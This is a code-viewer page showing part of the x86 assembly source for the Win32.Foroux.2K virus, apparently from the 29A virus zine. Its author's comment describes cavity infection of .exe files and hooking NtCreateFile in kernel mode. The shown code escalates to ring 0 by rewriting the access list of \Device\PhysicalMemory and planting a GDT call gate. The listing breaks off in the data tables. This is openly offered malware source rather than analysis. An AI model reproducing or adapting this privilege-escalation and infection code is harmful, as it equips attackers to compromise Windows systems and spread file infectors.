📄 29a-7.003
字号:
comment $
Win32.Foroux.2K
THIS is source code of a virus.
This is a Win2K/XP ring 0 PE virus,by WQ.
It took me only four days to code this virus.So there will be many bugs in it.
First when it runs,it will try to switch to ring 0 from ring 3.The routine entering ring 0 is from some other's C code--I only rewrite it in asm.
The routine that searches the API addresses in memory is copyed from Win32.Foroux.A(alias,Elkern.C,my another PE virus),it's a very good routine.
The infection method is as same as all Elkern family--cavity infection.It will insert pieces of itself to the cavity of host file,but if there are no enough place for it,it will append to the tail of host file.
After it entered ring 0,it will hook NtCreateFile by modifying KeServiceDescriptorTable.And any open file action will be intercepted.It only infect PE file with .exe extension.
It can't work on Win2K with /3G switch because it only search ntoskrnl base address between 80400000h and 80500000h.
$
.386p
.model flat
include win32.inc
includelib import32.lib
extrn MessageBoxA: proc
extrn ExitProcess: proc
extrn CreateProcessA: proc
DEBUG equ 1
if DEBUG
include debug.asm
endif
SECTION_QUERY equ 0001h
SECTION_MAP_WRITE equ 0002h
SECTION_MAP_READ equ 0004h
SECTION_MAP_EXECUTE equ 0008h
SECTION_EXTEND_SIZE equ 0010h
FILE_MAP_COPY equ SECTION_QUERY
FILE_MAP_WRITE equ SECTION_MAP_WRITE
FILE_MAP_READ equ SECTION_MAP_READ
HASH16FACTOR = 0ED388320h
HASH16 MACRO String,sym
HASH_Reg = 0FFFFFFFFh
IRPC _x, <String>
Ctrl_Byte = ('&_x&' XOR (HASH_Reg AND 0FFh))
HASH_Reg = (HASH_Reg SHR 8)
REPT 8
Ctrl_Byte = (Ctrl_Byte SHR 1) XOR (HASH16FACTOR * (Ctrl_Byte AND 1))
ENDM
HASH_Reg = (HASH_Reg XOR Ctrl_Byte)
ENDM
sym DW (HASH_Reg AND 0FFFFh)
ENDM
UNICODE_STR macro str
irpc _c,<str>
db '&_c'
db 0
endm
endm
BUFSIZE = 8192
INF_SIGN equ 'QW'
INF_MIN_BLK_SIZE equ 38h
MAX_BLK_NUM equ 100
MEM_INF_POS equ 1ch
POSPARAM equ 0e08h or ((PosInfo-NewNCF_IP) shl 16)
BASPARAM equ 0424h or ((BasInfo-NewNCF_IP) shl 16)
STDPARAM equ 051ch or ((StdInfo-NewNCF_IP) shl 16)
.data
cap db 'Haha',0
.code
vir_header:
dd 0
dw VirSize
dw 'QW'
_start:
call _start_ip_0
_start_ip_0:
_start_ip equ k32_hash_table
pop ebp
add ebp,k32_hash_table-_start_ip_0
mov ebx,[esp]
cmp ebx,80000000h
ja goto_host
lea edi,[ebp+k32_hash_table-8-_start_ip]
and ebx,0ffe00000h ;98-BFF70000,2K-77E80000,XP-77E60000
call search_api_addr
call _start_1
db 'ntdll',0
_start_1:
call [ebp+addrLoadLibraryA-_start_ip]
or eax,eax
jz goto_host
mov ebx,eax
lea edi,[ebp+ntdll_hash_table-8-_start_ip]
call search_api_addr
call _start_2
db 'advapi32',0
_start_2:
call [ebp+addrLoadLibraryA-_start_ip]
or eax,eax
jz goto_host
mov ebx,eax
lea edi,[ebp+advapi_hash_table-8-_start_ip]
call search_api_addr
push large 4 ;PAGE_READWRITE
push large 1000h ;MEM_COMMIT
push large VirSize*2
push large 0
call [ebp+addrVirtualAlloc-_start_ip]
or eax,eax
jz goto_host
mov [ebp+vir_mem-_start_ip],eax
merge_code_ip equ _start_ip
cld
lea esi,[ebp+_start-merge_code_ip]
mov edi,eax
; lea edx,[ebp+_start_ip-merge_code_ip]
mov edx,ebp
sub edx,[ebp+host_section_rva-merge_code_ip]
sub esi,edx
merge_code_loop:
add esi,edx
movzx ecx,word ptr [esi-4]
push esi
rep movsb
pop esi
mov esi,[esi-8]
or esi,esi
jnz short merge_code_loop
merge_code_end:
lea edx,[ebp+objnamestr-_start_ip]
mov [ebp+objnameptr-_start_ip],edx
lea edi,[ebp+ObjAttr-_start_ip]
and di,0fffch ;align to 4 bytes,or ZwOpenSection will fail
push edi
push large 24
pop ecx
push ecx
xor eax,eax
rep stosb
pop ecx
pop edi
mov esi,edi
stosd
mov [esi],ecx
stosd
lea eax,[edx-8]
stosd
mov dword ptr [edi],240h
push esi
push large 6 ;SECTION_MAP_READ|SECTION_MAP_WRITE
lea edi,[ebp+hSection-_start_ip]
push edi
call [ebp+addrZwOpenSection-_start_ip]
or eax,eax ;STATUS_SUCCESS?
jz OpenSectionOK ;Yes
push esi
push large 00060000h ;READ_CONTROL|WRITE_DAC
push edi
call [ebp+addrZwOpenSection-_start_ip]
push esi
xor eax,eax
push eax
mov ebx,esp
push eax
mov esi,esp
push ebx
push eax
push esi
push eax
push eax
push large 4 ;DACL_SECURITY_INFORMATION
push large 6 ;SE_KERNEL_OBJECT
push dword ptr [edi]
call [ebp+addrGetSecurityInfo-_start_ip]
;eAccess db
;02h,00h,00h,00h, 01h,00h,00h,00h,
;00h,00h,00h,00h, 00h,00h,00h,00h,
;00h,00h,00h,00h, 01h,00h,00h,00h,
;01h,00h,00h,00h, 50h,90h,41h,00h
push large 32
pop ecx
lea edi,[ebp+eAccess-_start_ip]
push edi
xor al,al
rep stosb
pop edi
inc al
mov byte ptr [edi],2
mov [edi+4],al
mov [edi+20],al
mov [edi+24],al
call _start_3
db 'CURRENT_USER',0
_start_3:
pop dword ptr [edi+28]
push ecx
push esp
push dword ptr [esi]
push edi
push large 1
call [ebp+addrSetEntriesInAclA-_start_ip]
xor eax,eax
mov ebx,[esp]
push eax
push ebx
push eax
push eax
push large 4 ;DACL_SECURITY_INFORMATION
push large 6 ;SE_KERNEL_OBJECT
mov edi,[ebp+hSection-_start_ip]
push edi
call [ebp+addrSetSecurityInfo-_start_ip]
push edi
call [ebp+addrZwClose-_start_ip]
add esp,12
push large 6 ;SECTION_MAP_READ|SECTION_MAP_WRITE
lea edi,[ebp+hSection-_start_ip]
push edi
call [ebp+addrZwOpenSection-_start_ip]
or eax,eax ;STATUS_SUCCESS?
jnz goto_host ;No
OpenSectionOK:
lea edi,[ebp+gGdt-_start_ip]
sgdt [edi]
inc dword ptr [edi]
movzx esi,word ptr [edi]
mov ebx,esi
mov eax,[edi+2]
cmp eax,80000000h
jc ring0_end1
cmp eax,0a0000000h
ja ring0_end1
and eax,1ffff000h
push esi
push eax
push large 0
push large FILE_MAP_READ or FILE_MAP_WRITE
push dword ptr [ebp+hSection-_start_ip]
call [ebp+addrMapViewOfFile-_start_ip]
or eax,eax
jz ring0_end1
mov ecx,esi
shr ecx,3
dec ecx
dec ebx
and bl,0f8h
lea edi,[eax+ebx]
FindGdtLoop:
sub edi,8
test byte ptr [edi+5],0fh
loopnz FindGdtLoop
jnz ring0_end1
add edi,8
lea ecx,[ebp+Ring0Entry-_start_ip]
lea esi,[ebp+CallGate-_start_ip]
mov word ptr [esi],cx
shr ecx,10h
mov word ptr [esi+6],cx
push edi
push large 2
pop ecx
rep movsd
pop edi
mov ecx,edi
sub ecx,eax
or cl,3
lea ebx,[ebp+calladdr-_start_ip]
mov [ebx+4],cx
push large VirSize
push ebp ;->_start
call [ebp+addrVirtualLock-_start_ip]
or eax,eax
jz ring0_end1
push large VirSize
push dword ptr [ebp+vir_mem-_start_ip]
call [ebp+addrVirtualLock-_start_ip]
or eax,eax
jz ring0_end1
call [ebp+addrGetCurrentThread-_start_ip]
mov esi,eax
push large 15 ;THREAD_PRIORITY_TIME_CRITICAL
push eax
call [ebp+addrSetThreadPriority-_start_ip]
push large 0
call [ebp+addrSleep-_start_ip]
call fword ptr [ebx]
push large 0 ;THREAD_PRIORITY_NORMAL
push esi
call [ebp+addrSetThreadPriority-_start_ip]
xor eax,eax
stosd
stosd
push large VirSize
push dword ptr [ebp+vir_mem-_start_ip]
call [ebp+addrVirtualUnlock-_start_ip]
push large VirSize
push ebp ;->_start
call [ebp+addrVirtualUnlock-_start_ip]
ring0_end1:
push dword ptr [ebp+hSection-_start_ip]
call [ebp+addrZwClose-_start_ip]
goto_host:
sub ebp,1000h+_start_ip-vir_header
host_section_rva equ dword ptr $-4
add ebp,offset host-400000h
host_entry_rva equ dword ptr $-4
push ebp
retn
init_data:
align 4
objname dw objnamestr_size,objnamestr_size+2
objnameptr dd 0
objnamestr equ this byte
UNICODE_STR <\Device\PhysicalMemory>
objnamestr_size equ $-objnamestr
CallGate db 00h,00h,08h,00h,00,0ECh,00h,00h
gGdt equ $
db 3 dup (0)
ObjAttr db 24 dup (0)
; hSection dd 0
; gGdt dw 3 dup (0)
; calladdr dw 3 dup (038h)
; eAccess db 32 dup (0)
db 'KERNEL32'
k32_hash_table equ this word
HASH16 <LoadLibraryA>,hsLoadLibraryA
HASH16 <MapViewOfFile>,hsMapViewOfFile
HASH16 <GetCurrentThread>,hsGetCurrentThread
HASH16 <SetThreadPriority>,hsSetThreadPriority
HASH16 <Sleep>,hsSleep
HASH16 <VirtualLock>,hsVirtualLock
HASH16 <VirtualAlloc>,hsVirtualAlloc
HASH16 <VirtualUnlock>,hsVirtualUnlock
if DEBUG
HASH16 <OutputDebugStringA>,hsOutputDebugStringA
HASH16 <GetLastError>,hsGetLastError
HASH16 <ExitProcess>,hsExitProcess
endif
dw 0
k32_hash_addr equ this dword
hHandle equ $
hSection equ $
calladdr equ $-4
addrLoadLibraryA dd 0
addrMapViewOfFile dd 0
addrGetCurrentThread dd 0
addrSetThreadPriority dd 0
addrSleep dd 0
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -